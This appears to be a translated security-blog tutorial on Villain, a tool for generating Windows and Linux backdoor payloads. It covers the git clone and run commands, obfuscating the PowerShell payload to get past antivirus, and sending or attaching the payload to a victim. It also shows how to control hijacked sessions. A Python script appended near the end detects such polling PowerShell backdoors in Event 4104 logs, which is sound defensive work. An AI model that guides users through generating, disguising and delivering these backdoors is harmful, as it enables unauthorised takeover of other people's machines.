Hello everyone! In today's article, I will introduce a shell hijacking tool for Windows and Linux called Villain. This is a pretty cool and interesting tool for those who are passionate about information security. So, straight to the point!
Note: This article is for research purposes only. Anonyviet takes no responsibility for any illegal acts.
Villain – Windows and Linux Shell Hijacking Tool
Villain is a tool for creating Windows and Linux backdoors. A feature I quite like is that it can connect two or more machines together to work, as if two or more hackers were hijacking one system.
The tool was made by t3l3machus, a penetration tester and cybersecurity researcher. Villain is inspired by the tool Hoaxshell. It is written entirely in Python 3 and is quite simple to use. Villain has a built-in automatic payload obfuscation function to help users bypass antivirus (for Windows payloads). Therefore, the payload is not detected (at the moment). The payloads generated by Villain are written in PowerShell.
How to install and use Villain
To install the tool, open a terminal and enter the following commands:
git clone https://github.com/t3l3machus/Villain
cd Villain
pip install -r requirements.txt
or pip3 install -r requirements.txt
After performing the above step, start the tool with the following command:
python Villain.py
or python3 Villain.py
(depending on the version of Python you are using)
Now enter the command help to see the usage guide.
To create backdoors, you first need to pay attention to the command generate, which means create.
Next is os=, the target operating system. I will take over a Windows shell, so I will choose windows as the operating system. If you want to choose Linux, enter os=linux.
Next is lhost=, where you enter the IP address or the network interface you are using. Here I will enter the interface as lhost=ens33.
Next is obfuscate. This keyword obfuscates the payload code to bypass antivirus.
After completing the above steps, press Enter so that the tool automatically generates a piece of code. When this code is executed on the victim's machine, it automatically runs in the background and sends a notification to the hacker that the shell has been successfully hijacked.
You just need to copy that code and open PowerShell to try it out. In addition, you can create a .ps1 file, paste that code into it, and then send it to the victim or attach it to a file of your choice, so remember not to cause illegal behavior. Now I will open PowerShell and paste it in to try it out ^^.
As the picture below shows, Villain has sent a notification that the backdoor has been executed on the victim's machine.
To control the victim's computer, do the following. First, enter the command sessions
This command shows the machines that have been hijacked. As you can see, the Session ID is the victim machine's ID, followed by the IP address, operating system, and user name. Now, to start controlling the shell, we enter sessions <session id of the victim machine>
for example: shell jhjadbae-823cgfsa-8263hfvd-shfvd678
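Because the payload described above is PowerShell that runs in the background and calls back to the operator, PowerShell script block logging (Event ID 4104) is a natural place to look for it on the defending side. The following Python triage script is an added example, not code from the original article or from the Villain project; the trait patterns, the record field names (event_id, host, script_block) and the sample events are assumptions constructed for illustration.

```python
import re

# Behavioural traits of a polling PowerShell backdoor. The patterns are
# assumptions made for this example, not signatures taken from Villain.
TRAITS = {
    "web_request": r"\b(invoke-webrequest|invoke-restmethod|iwr|irm)\b|net\.webclient",
    "dynamic_exec": r"\b(invoke-expression|iex)\b",
    "endless_loop": r"\b(while|for)\s*\(\s*(\$true|1|;;)\s*\)",
    "sleep": r"\b(start-sleep|sleep)\b",
}
CORE = {"web_request", "dynamic_exec", "endless_loop"}
CMDLET = re.compile(r"\b(?:invoke|start)-[a-z]+\b", re.I)

def case_scrambled(text, min_flips=3):
    """True if a cmdlet name has many lower->upper flips (iNvoKe-WebReQuest)."""
    return any(sum(a.islower() and b.isupper() for a, b in zip(n, n[1:])) >= min_flips
               for n in CMDLET.findall(text))

def analyse(script_block):
    """Return (traits found, alert flag) for one logged script block."""
    found = {n for n, p in TRAITS.items() if re.search(p, script_block, re.I)}
    if case_scrambled(script_block):
        found.add("case_scrambled")
    # Alert only on the full combination: fetch + execute inside an endless loop.
    return found, CORE <= found

def triage(events):
    """Yield (host, sorted traits) for Event ID 4104 records that alert."""
    for ev in events:
        if ev.get("event_id") != 4104:
            continue
        found, alert = analyse(ev.get("script_block", ""))
        if alert:
            yield ev["host"], sorted(found)

# Constructed sample records (not captured from a real system or from Villain).
SAMPLE_EVENTS = [
    {"event_id": 4104, "host": "WS-01",
     "script_block": "Get-ChildItem C:\\Logs | Sort-Object Length"},
    {"event_id": 4104, "host": "WS-02",
     "script_block": "while($true){Invoke-WebRequest -Uri $u | Out-Null; Start-Sleep 60}"},
    {"event_id": 4104, "host": "WS-03",
     "script_block": "wHiLe ($tRue){$c=(iNvoKe-WebReQuest -Uri <redacted>).Content;iEx $c;sLeeP 1}"},
]

if __name__ == "__main__":
    print(list(triage(SAMPLE_EVENTS)))
```

Only WS-03 alerts: WS-02 polls a URL in a loop but never executes what it fetches, so it is left alone. Matching is case-insensitive and keyed on behaviour rather than variable names, so renamed variables and scrambled casing do not hide the combination.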
Demo video of the Villain tool: https://youtu.be/NqZEmBsLCvQ
This is the end of this post, have a nice day!